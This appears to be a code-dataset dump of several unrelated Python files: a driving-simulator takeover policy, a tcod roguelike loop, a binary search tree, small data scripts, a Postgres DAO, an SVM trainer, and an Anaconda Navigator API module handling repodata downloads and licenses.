self.engine.current_track_vehicle.expert_takeover\n\n\nclass TakeoverPolicy(EnvInputPolicy):\n \"\"\"\n Record the takeover signal\n \"\"\"\n def __init__(self, obj, seed):\n super(TakeoverPolicy, self).__init__(obj, seed)\n config = get_global_config()\n if config[\"manual_control\"] and config[\"use_render\"]:\n if config[\"controller\"] == \"joystick\":\n self.controller = SteeringWheelController()\n else:\n raise ValueError(\"Takeover policy can only be activated with SteeringWheel\")\n self.takeover = False\n\n def act(self, agent_id):\n agent_action = super(TakeoverPolicy, self).act(agent_id)\n if self.engine.global_config[\"manual_control\"] and self.engine.agent_manager.get_agent(\n agent_id) is self.engine.current_track_vehicle and not self.engine.main_camera.is_bird_view_camera():\n expert_action = self.controller.process_input(self.engine.current_track_vehicle)\n if self.controller.left_shift_paddle or self.controller.right_shift_paddle:\n # if expert_action[0]*agent_action[0]< 0 or expert_action[1]*agent_action[1] < 0:\n self.takeover = True\n return expert_action\n self.takeover = False\n return agent_action\n","sub_path":"metadrive/policy/manual_control_policy.py","file_name":"manual_control_policy.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"653427842","text":"import tcod\r\nimport tcod.event as tc_event\r\nfrom input_handlers import handle_keys\r\nfrom entity import Entity\r\nfrom map_objects.game_map import GameMap\r\nfrom render_functions import render_all, clear_all\r\n\r\n\r\ndef main():\r\n screen_width = 80\r\n screen_height = 50\r\n\r\n map_width = 80\r\n map_height = 45\r\n room_max_size = 10\r\n room_min_size = 6\r\n max_rooms = 30\r\n\r\n colors = {\r\n 'dark_wall': tcod.Color(0, 0, 100),\r\n 
'dark_ground': tcod.Color(50, 50, 150),\r\n }\r\n\r\n player = Entity(int(screen_width/2), int(screen_height/2), '@', tcod.white)\r\n npc = Entity(int(screen_width / 2 - 5), int(screen_height / 2), '@', tcod.yellow)\r\n entities = [npc, player]\r\n\r\n tcod.console_set_custom_font('arial10x10.png', tcod.FONT_TYPE_GRAYSCALE | tcod.FONT_LAYOUT_TCOD)\r\n\r\n con = tcod.console_init_root(screen_width, screen_height, 'tcod tutorial revised', False, tcod.RENDERER_SDL2)\r\n\r\n game_map = GameMap(map_width, map_height)\r\n game_map.make_map(max_rooms, room_min_size, room_max_size, map_width, map_height, player)\r\n\r\n tcod.console_set_char_background(con, 6, 6, tcod.red, flag=tcod.BKGND_NONE )\r\n while True: # Main loop\r\n\r\n render_all(con, entities, game_map, screen_width, screen_height, colors)\r\n tcod.console_flush()\r\n clear_all(con, entities)\r\n\r\n for event in tc_event.wait():\r\n if event.type == \"QUIT\":\r\n print(event)\r\n raise SystemExit()\r\n elif event.type == \"KEYDOWN\":\r\n action = handle_keys(event)\r\n\r\n move = action.get('move')\r\n exit = action.get('exit')\r\n fullscreen = action.get('fullscreen')\r\n\r\n if move:\r\n dx, dy = move\r\n if not game_map.is_blocked(player.x + dx, player.y + dy):\r\n player.move(dx, dy)\r\n\r\n if exit:\r\n raise SystemExit()\r\n\r\n if fullscreen:\r\n tcod.console_set_fullscreen(not tcod.console_is_fullscreen())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"262529124","text":"\"\"\"\nImplement Binary Search Tree\n\"\"\"\n\nclass Node:\n\n def __init__(self,value):\n self.value = value\n self.right = None\n self.left = None\n\nclass BinarySearchTree:\n\n def __init__(self):\n self.root = None\n\n def insertloop(self,value):\n newNode = Node(value)\n if self.root == None:\n self.root = newNode\n return\n else:\n current = self.root\n while True:\n if value < current.value:\n if current.left == None:\n current.left = newNode\n return\n else:\n current = current.left\n elif value > current.value:\n if current.right == None:\n current.right = newNode\n return\n else:\n current = current.right\n \n\n def insert(self,value):\n if self.root == None:\n self.root = Node(value)\n return\n\n return self.insertNode(value,self.root) # you could also do this with a loop\n # instead of recursively\n\n def insertNode(self,value,node=None):\n\n if value > node.value:\n if node.right == None:\n node.right = Node(value)\n return\n else:\n self.insertNode(value,node=node.right)\n\n elif value < node.value:\n if node.left == None:\n node.left = Node(value)\n return\n else:\n self.insertNode(value,node=node.left)\n\n\n def find(self,value):\n if self.root == None:\n return None\n\n return self.findNode(value,self.root) # you could also do this with a loop\n # instead of recursively\n\n def findNode(self,value,node=None):\n if node == None:\n return None\n if node.value == value:\n return node\n\n if value > node.value:\n if node.right != None:\n return self.findNode(value,node=node.right) # propagate the found node back up\n\n elif value < node.value:\n if node.left != None:\n return self.findNode(value,node=node.left) # propagate the found node back up\n\n return None\n\nif __name__ == \"__main__\":\n bins = BinarySearchTree()\n NodeRoot = Node(10)\n node1 = Node(5)\n node2 = Node(13)\n node3 = Node(2)\n node4 = Node(7)\n node5 = Node(10)\n node6 = Node(16)\n NodeRoot.left = node1\n NodeRoot.right = node2\n node1.left = node3\n 
node1.right = node4\n node2.left = node5\n node2.right = node6\n bins.root = NodeRoot\n bins.insertloop(8)\n bins.find(2)\n","sub_path":"Old/ColtSteele/DS/BinarySearchTree.py","file_name":"BinarySearchTree.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571210536","text":"import csv\nwith open(\"shuzhe2.csv\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n a = 0\n cartdata = open('cart2.txt', 'r')\n for data in cartdata:\n date = data.strip()\n bac = str(row[0])\n # if '643824322783' in bac and '643824322783' in date:\n # print(date, repr(date), bac, repr(bac))\n if (str.find(date,bac) != -1 or str.find(bac, date) != -1) and date != '' and bac != '':\n a = a+1\n print(date, bac)\n f = open('matrix.txt', 'a')\n f.write('%s, %s' % (date, bac))\n f.write('\\n')\n f.close()\n break\n if a == 0:\n f = open('matrix.txt', 'a')\n f.write('FALSE')\n f.write('\\n')\n f.close()\n else:\n f = open('matrix.txt', 'a')\n f.write('TRUE')\n f.write('\\n')\n a = 0\n f.close()\ncartdata.close()\n","sub_path":"SKU finder/sccnew.py","file_name":"sccnew.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"26701902","text":"from config.dbconfig import pg_config\nimport psycopg2\n\nclass RequestersDAO:\n def __init__(self):\n connection_url = \"dbname=%s user=%s password=%s\" % (pg_config['dbname'], pg_config['user'], pg_config['passwd'])\n self.conn = psycopg2.connect(connection_url) # use the public connect() API\n\n def getAllRequesters(self):\n cursor = self.conn.cursor()\n query = \"select * from requesters;\"\n cursor.execute(query)\n result = []\n for row in cursor:\n result.append(row)\n return result\n\n def getRequesterById(self, reqID):\n cursor = self.conn.cursor()\n query = \"select * from requesters where reqID = %s;\"\n cursor.execute(query, (reqID,))\n result = cursor.fetchone()\n return result","sub_path":"dao/requesters.py","file_name":"requesters.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331513489","text":"import numpy as np\r\nimport pandas as pd \r\nfrom sklearn.svm import SVC\r\nimport sys\r\nimport os\r\n\r\nt = {'bind': 1, 'not_bind': 0}\r\n\r\ndef load_data(l):\r\n\tres = []\r\n\tlabels = []\r\n\tfor i in l:\r\n\t\tlabel = t[i.split('/')[-2]]\r\n\t\tc = pd.read_csv(i, sep='\\t', header = None).values.flatten()\r\n\t\tres.append(c)\r\n\t\tlabels.append(label)\r\n\treturn res, labels\r\n\r\ndef train(x, y):\r\n\tsvc = SVC()\r\n\tsvc.fit(x, y)\r\n\treturn svc \r\n\r\ndef test(svc, x, y):\r\n\treturn svc.score(x, y)\r\n\r\ndef main(train_path, test_path):\r\n\tprint('loading dataset')\r\n\ttrain_x, train_y = load_data([os.path.join(train_path, 'bind', x) for x in os.listdir(os.path.join(train_path, 'bind'))] + [os.path.join(train_path, 'not_bind', x) for x in os.listdir(os.path.join(train_path, 'not_bind'))])\r\n\ttest_x, test_y = train_x, train_y#load_data([os.path.join(test_path, 'bind', x) for x in os.listdir(os.path.join(test_path, 'bind'))] + [os.path.join(test_path, 'not_bind', x) for x in os.listdir(os.path.join(test_path, 'not_bind'))])\r\n\tprint('training')\r\n\tc = train(train_x, train_y)\r\n\tprint('testing')\r\n\ttrain_acc, test_acc = test(c, train_x, train_y), test(c, test_x, test_y)\r\n\tprint('train_acc: %f, test_acc: %f' % (train_acc, test_acc))\r\n\r\nif 
__name__ == '__main__':\r\n\tmain(sys.argv[1], sys.argv[2])","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"19032733","text":"print(\"acontinuacion se le pedira el peso de cada uno de sus bultos, si no tiene mas, por favor poner 0\")\nc=int(input(\"bultos que va a ingresar: \"))#esto lo hago por que ya lo probe con 15 y me parecia buena idea que usted lo intentara con varios bultos\ncont1=0\ncont2=0\nbultos=0\npesoTotal=0\nvalorTotal=0\nfor i in range(0,c):\n a=float(input(\"ingresar peso\"))\n if i==0 and a<500:\n cont1=a\n cont2=a\n if a < cont2 and a!=0 :\n cont2 = a\n if a>cont1 and a<501:\n cont1=a\n if a!=0 and a>0 and a<=25:\n bultos+=1\n pesoTotal=pesoTotal+a\n if a!=0 and a>25 and a<=300:\n bultos+=1\n pesoTotal=pesoTotal+a\n valorTotal=valorTotal+(a*1500)\n if a!=0 and a>300 and a<=500:\n bultos+=1\n pesoTotal=pesoTotal+a\n valorTotal=valorTotal+(a*2500)\n if a>500 :\n print(\"Este bulto no sera puesto en el avion por exceso de peso\")\n if a==0 :\n break\nif pesoTotal>1800:\n print(\"no podemos subir esto al avion por que su peso es: \",pesoTotal,\"El peso debese menor o igual a 1800\")\nelse:\n if pesoTotal <=1800:\n print(\"el numero total de bultos es:\", bultos)\n print(\"El peso del bulto mas pesado es\", cont1, \"\\nEl bulto menos pesado es: \", cont2)\n print(\"El peso promedio de peso cada bulto es\", (pesoTotal / bultos))\n print(\"El precio de el total de bultos en pesos colobiamnos es: \", valorTotal)\n print(\"el valor por peso en dolares sera: \", (valorTotal * 3165)) # El dvalor del dolar el dia sabado\n print(\"el valor por peso de los bultos en colombianos 5es: \",pesoTotal)\n\n\n\n","sub_path":"punto 78.py","file_name":"punto 78.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"328008359","text":"# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright 2016 Continuum Analytics, Inc.\n#\n# May be copied and distributed freely only as part of an Anaconda or\n# Miniconda installation.\n# -----------------------------------------------------------------------------\n\"\"\"API for using the api (anaconda-client, downloads and conda).\"\"\"\n\n# yapf: disable\n\n# Standard library imports\nfrom collections import OrderedDict\nimport copy\nimport datetime\nimport json\nimport os\n\n# Third party imports\nfrom qtpy.QtCore import QObject, Signal\nimport _license\n\n# Local imports\nfrom anaconda_navigator.api.client_api import ClientAPI\nfrom anaconda_navigator.api.conda_api import CondaAPI\nfrom anaconda_navigator.api.download_api import DownloadAPI\nfrom anaconda_navigator.config import (CONF, LICENSE_NAME_FOR_PACKAGE,\n LICENSE_PATH, PACKAGES_WITH_LICENSE,\n REMOVED_LICENSE_PATH,\n VALID_PRODUCT_LICENSES)\nfrom anaconda_navigator.static import images\n\n\n# yapf: enable\n\n\nclass _AnacondaAPI(QObject):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n\n sig_repodata_updated = Signal(object)\n sig_repodata_errored = Signal()\n\n def __init__(self):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n super(_AnacondaAPI, self).__init__()\n\n # API's\n self.config = CONF\n self._conda_api = CondaAPI()\n self._client_api = ClientAPI()\n self._download_api = DownloadAPI()\n self.ROOT_PREFIX = self._conda_api.ROOT_PREFIX\n\n # Vars\n self._checking_repos = None\n 
self._data_directory = None\n self._files_downloaded = None\n self._repodata_files = None\n self._valid_repos = None\n\n # Expose some methods for convenient access. Methods return a worker\n self.conda_create = self._conda_api.create\n self.conda_create_yaml = self._conda_api.create_from_yaml\n self.conda_clone = self._conda_api.clone_environment\n self.conda_dependencies = self._conda_api.dependencies\n self.conda_get_condarc_channels = self._conda_api.get_condarc_channels\n self.conda_install = self._conda_api.install\n self.conda_remove = self._conda_api.remove\n self.conda_terminate = self._conda_api.terminate_all_processes\n self.conda_config_add = self._conda_api.config_add\n self.conda_config_set = self._conda_api.config_set\n self.conda_config_remove = self._conda_api.config_remove\n self.pip_list = self._conda_api.pip_list\n self.pip_remove = self._conda_api.pip_remove\n\n # No workers are returned for these methods\n self.conda_clear_lock = self._conda_api.clear_lock\n self.conda_environment_exists = self._conda_api.environment_exists\n self.conda_get_envs = self._conda_api.get_envs\n self.conda_linked = self._conda_api.linked\n self.conda_linked_apps_info = self._conda_api.linked_apps_info\n self.conda_get_prefix_envname = self._conda_api.get_prefix_envname\n self.conda_package_version = self._conda_api.package_version\n self.conda_platform = self._conda_api.get_platform\n self.conda_load_proxy_config = self._conda_api.load_proxy_config\n\n self.conda_split_canonical_name = self._conda_api.split_canonical_name\n\n # These download methods return a worker\n _get_api_info = self._download_api.get_api_info\n _is_valid_url = self._download_api.is_valid_api_url\n _get_api_url = self._client_api.get_api_url\n self.download = self._download_api.download\n self.download_is_valid_url = self._download_api.is_valid_url\n self.download_is_valid_api_url = _is_valid_url\n self.download_get_api_info = lambda: _get_api_info(_get_api_url())\n self.download_is_valid_channel = self._download_api.is_valid_channel\n self.download_terminate = self._download_api.terminate\n\n # These client methods return a worker\n self.client_store_token = self._client_api.store_token\n self.client_remove_token = self._client_api.remove_token\n self.client_login = self._client_api.login\n self.client_logout = self._client_api.logout\n self.client_load_repodata = self._client_api.load_repodata\n self.client_prepare_packages_data = self._client_api.prepare_model_data\n self.client_user = self._client_api.user\n self.client_domain = self._client_api.domain\n self.client_set_domain = self._client_api.set_domain\n self.client_packages = self._client_api.packages\n self.client_multi_packages = self._client_api.multi_packages\n self.client_organizations = self._client_api.organizations\n self.client_load_token = self._client_api.load_token\n self.client_get_api_url = self._client_api.get_api_url\n self.client_set_api_url = self._client_api.set_api_url\n self.client_get_ssl = self._client_api.get_ssl\n self.client_set_ssl = self._client_api.set_ssl\n self.client_get_user_licenses = self._client_api.get_user_licenses\n\n # No workers are returned for these methods\n m = self._client_api.get_logged_user_list_channels\n self.client_get_logged_user_list_channels = m\n\n # --- Helper methods\n # -------------------------------------------------------------------------\n def _set_repo_urls_from_channels(self, channels):\n \"\"\"\n Convert a channel into a normalized repo name including.\n\n Channels are assumed in normalized url 
form.\n \"\"\"\n repos = []\n sys_platform = self._conda_api.get_platform()\n\n # Platform specific channels\n for channel in channels:\n url = '{0}/{1}/repodata.json.bz2'.format(channel, sys_platform)\n repos.append(url)\n\n # Noarch channels\n for channel in channels:\n url = '{0}/noarch/repodata.json.bz2'.format(channel)\n repos.append(url)\n\n return repos\n\n def _check_repos(self, repos):\n \"\"\"Check if repodata urls are valid.\"\"\"\n self._checking_repos = []\n self._valid_repos = []\n\n for repo in repos:\n worker = self.download_is_valid_url(repo)\n worker.sig_finished.connect(self._repos_checked)\n worker.repo = repo\n self._checking_repos.append(repo)\n\n def _repos_checked(self, worker, output, error):\n \"\"\"Callback for _check_repos.\"\"\"\n if worker.repo in self._checking_repos:\n self._checking_repos.remove(worker.repo)\n\n if output:\n self._valid_repos.append(worker.repo)\n\n if len(self._checking_repos) == 0:\n self._download_repodata(self._valid_repos)\n\n def _repo_url_to_path(self, repo):\n \"\"\"Convert a `repo` url to a file path for local storage.\"\"\"\n repo = repo.replace('http://', '')\n repo = repo.replace('https://', '')\n repo = repo.replace('/', '_')\n\n return os.sep.join([self._data_directory, repo])\n\n def _download_repodata(self, checked_repos):\n \"\"\"Dowload repodata.\"\"\"\n self._files_downloaded = []\n self._repodata_files = []\n self.__counter = -1\n\n if checked_repos:\n for repo in checked_repos:\n path = self._repo_url_to_path(repo)\n self._files_downloaded.append(path)\n self._repodata_files.append(path)\n worker = self.download(\n repo,\n path,\n verify=self._client_api.get_ssl(),\n )\n worker.url = repo\n worker.path = path\n worker.sig_finished.connect(self._repodata_downloaded)\n else:\n # Empty, maybe there is no internet connection\n # Load information from conda-meta and save that file\n path = self._get_repodata_from_meta()\n self._repodata_files = [path]\n self._repodata_downloaded()\n\n def _get_repodata_from_meta(self):\n \"\"\"Generate repodata from local meta files.\"\"\"\n path = os.sep.join([self.ROOT_PREFIX, 'conda-meta'])\n packages = os.listdir(path)\n meta_repodata = {}\n for pkg in packages:\n if pkg.endswith('.json'):\n filepath = os.sep.join([path, pkg])\n with open(filepath, 'r') as f:\n data = json.load(f)\n\n if 'files' in data:\n data.pop('files')\n if 'icondata' in data:\n data.pop('icondata')\n\n name = pkg.replace('.json', '')\n meta_repodata[name] = data\n\n meta_repodata_path = os.sep.join(\n [\n self._data_directory,\n 'offline.json',\n ]\n )\n repodata = {'info': [], 'packages': meta_repodata}\n\n with open(meta_repodata_path, 'w') as f:\n json.dump(\n repodata,\n f,\n sort_keys=True,\n indent=4,\n separators=(',', ': '),\n )\n\n return meta_repodata_path\n\n def _repodata_downloaded(self, worker=None, output=None, error=None):\n \"\"\"Callback for _download_repodata.\"\"\"\n if worker:\n self._files_downloaded.remove(worker.path)\n\n if worker.path in self._files_downloaded:\n self._files_downloaded.remove(worker.path)\n\n if len(self._files_downloaded) == 0:\n self.sig_repodata_updated.emit(list(set(self._repodata_files)))\n\n # --- Public API\n # -------------------------------------------------------------------------\n def set_data_directory(self, data_directory):\n \"\"\"Set the directory where repodata and metadata are stored.\"\"\"\n self._data_directory = data_directory\n\n def repodata_files(self, channels=None):\n \"\"\"\n Return the repodata paths based on `channels` and the 
`data_directory`.\n\n There is no check for validity here.\n \"\"\"\n if channels is None:\n channels = self.conda_get_condarc_channels()\n\n repodata_urls = self._set_repo_urls_from_channels(channels)\n\n repopaths = []\n\n for repourl in repodata_urls:\n fullpath = os.sep.join([self._repo_url_to_path(repourl)])\n repopaths.append(fullpath)\n\n return repopaths\n\n def update_repodata(self, channels=None):\n \"\"\"Update repodata from channels or use condarc channels if None.\"\"\"\n norm_channels = self.conda_get_condarc_channels(\n channels=channels,\n normalize=True,\n )\n repodata_urls = self._set_repo_urls_from_channels(norm_channels)\n self._check_repos(repodata_urls)\n\n def update_metadata(self):\n \"\"\"\n Update the metadata available for packages in repo.continuum.io.\n\n Returns a download worker.\n \"\"\"\n # TODO: there needs to be an uniform way to query the metadata for\n # both repo and anaconda.org\n if self._data_directory is None:\n raise Exception('Need to call `api.set_data_directory` first.')\n\n metadata_url = 'https://repo.continuum.io/pkgs/metadata.json'\n filepath = os.sep.join([self._data_directory, 'metadata.json'])\n worker = self.download(metadata_url, filepath)\n return worker\n\n def check_valid_channel(\n self, channel, conda_url='https://conda.anaconda.org'\n ):\n \"\"\"Check if channel is valid.\"\"\"\n if channel.startswith('https://') or channel.startswith('http://'):\n url = channel\n else:\n url = \"{0}/{1}\".format(conda_url, channel)\n\n if url[-1] == '/':\n url = url[:-1]\n plat = self.conda_platform()\n repodata_url = \"{0}/{1}/{2}\".format(url, plat, 'repodata.json')\n worker = self.download_is_valid_url(repodata_url)\n worker.url = url\n return worker\n\n def process_apps(self, apps, prefix=None):\n \"\"\"Process app information.\"\"\"\n # TODO: This also needs to check installed apps in the prefix\n applications = {}\n if prefix is None:\n prefix = self.ROOT_PREFIX\n\n # Temporal hardcoded images\n image_paths = {\n 'glueviz': images.GLUEVIZ_ICON_1024_PATH,\n 'spyder-app': images.SPYDER_ICON_1024_PATH,\n 'spyder': images.SPYDER_ICON_1024_PATH,\n 'ipython-qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'qtconsole': images.IPYTHON_QTCONSOLE_ICON_1024_PATH,\n 'ipython-notebook': images.IPYTHON_NOTEBOOK_ICON_1024_PATH,\n 'notebook': images.NOTEBOOK_ICON_1024_PATH,\n 'orange-app': images.ORANGE_ICON_1024_PATH,\n 'rodeo': images.RODEO_ICON_1024_PATH,\n 'veusz': images.VEUSZ_ICON_1024_PATH,\n 'rstudio': images.RSTUDIO_ICON_PATH,\n }\n\n APPS_DESCRIPTIONS = {\n 'glueviz': (\n 'Multidimensional data visualization across files. '\n 'Explore relationships within and among related '\n 'datasets.'\n ),\n 'notebook': (\n 'Web-based, interactive computing notebook '\n 'environment. Edit and run human-readable docs while '\n 'describing the data analysis.'\n ),\n 'orange-app': (\n 'Component based data mining framework. Data '\n 'visualization and data analysis for novice and '\n 'expert. Interactive workflows with a large '\n 'toolbox.'\n ),\n 'qtconsole': (\n 'PyQt GUI that supports inline figures, proper '\n 'multiline editing with syntax highlighting, '\n 'graphical calltips, and more.'\n ),\n 'spyder': (\n 'Scientific PYthon Development EnviRonment. Powerful '\n 'Python IDE with advanced editing, interactive '\n 'testing, debugging and introspection features'\n ),\n 'rodeo': (\n 'A browser-based IDE for data science with python. 
'\n 'Includes autocomplete, syntax highlighting, IPython '\n 'support.'\n ),\n 'veusz': (\n 'Veusz is a GUI scientific plotting and graphing '\n 'package. It is designed to produce publication-ready '\n 'Postscript or PDF output.'\n ),\n 'rstudio': (\n 'A set of integrated tools designed to help you be '\n 'more productive with R. Includes R essentials and notebooks.'\n ),\n 'anaconda-fusion': (\n 'Integration between Excel ® and Anaconda '\n 'via Notebooks. Run data science functions, '\n 'interact with results and create advanced '\n 'visualizations in a code-free app inside '\n 'Excel'\n ),\n 'anaconda-mosaic': (\n 'Interactive exploration of larger than '\n 'memory datasets. Create data sources, '\n 'perform transformations and combinations.'\n ),\n }\n\n invalid_apps = [\n 'spyder-app',\n 'ipython-qtconsole',\n 'ipython-notebook',\n 'anacondafusion',\n ]\n\n for app_name in apps:\n if app_name in invalid_apps:\n continue\n\n data = apps[app_name]\n versions = data.get('versions')\n description = APPS_DESCRIPTIONS.get(\n app_name, data.get('description', '')\n )\n version = versions[-1] # Versions are sorted from small to big\n image_path = image_paths.get(\n app_name, images.ANACONDA_ICON_512_PATH\n )\n app_entry = data.get('app_entry').get(version, '')\n\n # Handle deprecated entrypoints for notebook and qtconsole\n if 'ipython notebook' in app_entry.lower():\n app_entry = app_entry.replace(\n 'ipython notebook', 'jupyter-notebook'\n )\n elif 'ipython qtconsole' in app_entry.lower():\n app_entry = app_entry.replace(\n 'ipython qtconsole', 'jupyter-qtconsole'\n )\n\n needs_license = app_name.lower() in PACKAGES_WITH_LICENSE\n application = dict(\n name=app_name,\n description=description,\n versions=versions,\n command=app_entry,\n image_path=image_path,\n needs_license=needs_license,\n )\n applications[app_name] = application\n\n return applications\n\n # --- New moved API\n # -------------------------------------------------------------------------\n @property\n def channels(self):\n \"\"\"Convenience property for returning conda rc channels.\"\"\"\n return list(self.conda_get_condarc_channels())\n\n @property\n def active_channels(self):\n \"\"\"Convenience property for returning active channels.\"\"\"\n active_channels = self.config.get('main', 'conda_active_channels')\n if active_channels is None or not active_channels:\n active_channels = self.channels\n return active_channels\n\n @property\n def active_normalized_channels(self):\n \"\"\"Convenience property for returning active normalized channels.\"\"\"\n return self.conda_get_condarc_channels(\n channels=self.active_channels,\n normalize=True,\n )\n\n @property\n def user_dynamic_channels(self):\n \"\"\"\n Return normalized list of logged user channels.\n\n These are the channels that are located at anaconda server (cloud),\n as opposed to the repo.continuum ones.\n\n FIXME: This method is flawed as defaults could also include logged\n channels.\n \"\"\"\n channels = []\n condarc_channels = self._conda_api.get_condarc_channels()\n\n for ch in condarc_channels:\n if ('repo.continuum' not in ch and ch != 'defaults' and\n '/t/' not in ch):\n channels.append(ch)\n\n channels = [ch for ch in channels if ch in self.active_channels]\n return channels\n\n @property\n def environments(self):\n \"\"\"\n Return an ordered dictionary of all existing named environments.\n\n The dictionary includes the root environment as the first entry.\n \"\"\"\n environments = OrderedDict()\n environments_prefix = 
sorted(self.conda_get_envs(log=False))\n environments['root'] = self.ROOT_PREFIX\n\n for prefix in environments_prefix:\n name = os.path.basename(prefix)\n environments[name] = prefix\n\n return environments\n\n # --- License management\n # -------------------------------------------------------------------------\n def add_license(self, paths):\n \"\"\"Add license file callback.\"\"\"\n valid_licenses = {}\n invalid_licenses = {}\n paths = [p for p in paths if os.path.isfile(p)]\n for path in paths:\n lic = _license.read_licenses(path)\n if lic:\n valid_licenses[path] = lic\n else:\n invalid_licenses[path] = None\n\n # FIXME: Check if license name exists in any of the paths\n # And then ask the user a question based on this\n if not os.path.isdir(self.license_location()):\n os.mkdir(self.license_location())\n\n for path in valid_licenses:\n head, tail = os.path.split(path)\n new_path = os.path.join(self.license_location(), tail)\n with open(new_path, 'w') as f:\n json.dump(valid_licenses[path], f)\n\n return valid_licenses, invalid_licenses\n\n @staticmethod\n def remove_license(lic):\n \"\"\"Remove license callback.\"\"\"\n path = lic.get(LICENSE_PATH)\n sig = lic.get('sig')\n\n with open(path) as f:\n licenses = json.load(f)\n\n for i, lic in enumerate(licenses):\n if lic.get('sig') == sig:\n break\n\n removed_license = licenses.pop(i)\n with open(path, 'w') as f:\n json.dump(licenses, f)\n\n head, tail = os.path.split(os.path.abspath(path))\n removed_folder = os.path.join(head, REMOVED_LICENSE_PATH)\n removed_path = os.path.join(removed_folder, tail)\n\n if not os.path.isdir(removed_folder):\n os.mkdir(removed_folder)\n\n removed_licenses = [removed_license]\n if os.path.isfile(removed_path):\n # Merge removed files\n with open(removed_path) as f:\n existing_removed_licenses = json.load(f)\n removed_licenses.extend(existing_removed_licenses)\n\n with open(removed_path, 'w') as f:\n json.dump(removed_licenses, f)\n\n @classmethod\n def load_licenses(cls, product=None):\n \"\"\"Load license files.\"\"\"\n res = []\n # This is used instead of _license.find_licenses to have the path\n # for each file\n for license_path in cls.license_paths():\n licenses = _license.read_licenses(license_path)\n for lic in licenses:\n product_name = lic.get('product')\n product_filter = product == product_name if product else True\n if product_name in VALID_PRODUCT_LICENSES and product_filter:\n valid = cls.is_valid_license(lic)\n lic['__valid__'] = valid\n lic['__status__'] = 'Valid' if valid else 'Invalid'\n lic['__type__'] = lic.get('type', 'Enterprise').lower()\n lic[LICENSE_PATH] = license_path\n res.append(lic)\n return res\n\n @classmethod\n def get_package_license(cls, package_name):\n \"\"\"\n Get stored license for a package.\n\n If several license found only the valid ones with the largest date\n is returned. Priority is given to nontrial over trial licenses, even\n if a trial has a larger date.\n \"\"\"\n all_licenses = []\n for name in LICENSE_NAME_FOR_PACKAGE.get(package_name, []):\n licenses = cls.load_licenses(product=name)\n valid_licenses = [l for l in licenses if cls.is_valid_license(l)]\n all_licenses.extend(valid_licenses)\n\n # Order by trial and non trial. 
And select the one with the\n # longest remaining days giving priority to non trial.\n trial_valid_licenses = []\n nontrial_valid_licenses = []\n\n for lic in all_licenses:\n if cls.is_trial_license(lic):\n trial_valid_licenses.append(lic)\n else:\n nontrial_valid_licenses.append(lic)\n\n trial_valid_licenses = sorted(\n trial_valid_licenses,\n key=lambda i: i.get('end_date'),\n )\n nontrial_valid_licenses = sorted(\n nontrial_valid_licenses,\n key=lambda i: i.get('end_date'),\n )\n\n if nontrial_valid_licenses:\n lic = nontrial_valid_licenses[-1] # Larger date\n elif trial_valid_licenses:\n lic = trial_valid_licenses[-1] # Larger date\n else:\n lic = {}\n\n return lic\n\n @staticmethod\n def license_paths():\n \"\"\"Return license paths found on main location.\"\"\"\n return _license.get_license_paths()\n\n @staticmethod\n def license_location():\n \"\"\"Return license main location.\"\"\"\n return _license.get_license_dirs()[0]\n\n @classmethod\n def is_valid_license(cls, lic):\n \"\"\"Return whether a license dictionary is valid.\"\"\"\n verified = cls.is_verified_license(lic)\n expired = cls.is_expired_license(lic)\n valid_vendor = cls.is_valid_vendor(lic)\n return verified and not expired and valid_vendor\n\n @staticmethod\n def is_verified_license(lic):\n \"\"\"Check that the license is verified.\"\"\"\n # Clean license from additional keys\n check_license = copy.deepcopy(lic)\n\n for key in lic:\n if key.startswith('__') and key.endswith('__'):\n check_license.pop(key)\n\n return bool(_license.verify_license(check_license))\n\n @staticmethod\n def is_valid_vendor(lic):\n \"\"\"Check if a license is from a valid vendor.\"\"\"\n vendor = lic[\"vendor\"]\n return vendor in (\n \"Continuum Analytics, Inc.\",\n \"Continuum Analytics\",\n \"continuum\",\n )\n\n @classmethod\n def is_expired_license(cls, lic):\n \"\"\"Check if the license is expired.\"\"\"\n return cls.get_days_left(lic) == 0\n\n @staticmethod\n def is_trial_license(lic):\n \"\"\"Check if a license is of trial type.\"\"\"\n return lic.get('type').lower() == 'trial'\n\n @classmethod\n def is_enterprise_license(cls, lic):\n \"\"\"Check if a license is of enterprise type.\"\"\"\n return not cls.is_trial_license(lic)\n\n @staticmethod\n def get_days_left(lic):\n \"\"\"Get the number of days left for a license.\"\"\"\n days = 0\n\n try:\n end_date = _license.date_from_string(lic.get(\"end_date\", ''))\n days = (end_date - datetime.date.today()).days\n if days < 0:\n days = 0\n except (ValueError, TypeError):\n days = 0\n\n if \"end_date\" not in lic:\n days = float(\"inf\")\n\n return days\n\n\nANACONDA_API = None\n\n\ndef AnacondaAPI():\n \"\"\"Manager API threaded worker.\"\"\"\n global ANACONDA_API\n\n if ANACONDA_API is None:\n ANACONDA_API = _AnacondaAPI()\n\n return ANACONDA_API\n\n\n# --- Local testing\n# -----------------------------------------------------------------------------\ndef finished(worker, output, error): # pragma: no cover\n \"\"\"Print information on test finished.\"\"\"\n print(worker, output, error)\n\n\ndef download_finished(url, path): # pragma: no cover\n \"\"\"Print information on download finished.\"\"\"\n print(url, path)\n\n\ndef repodata_updated(repos): # 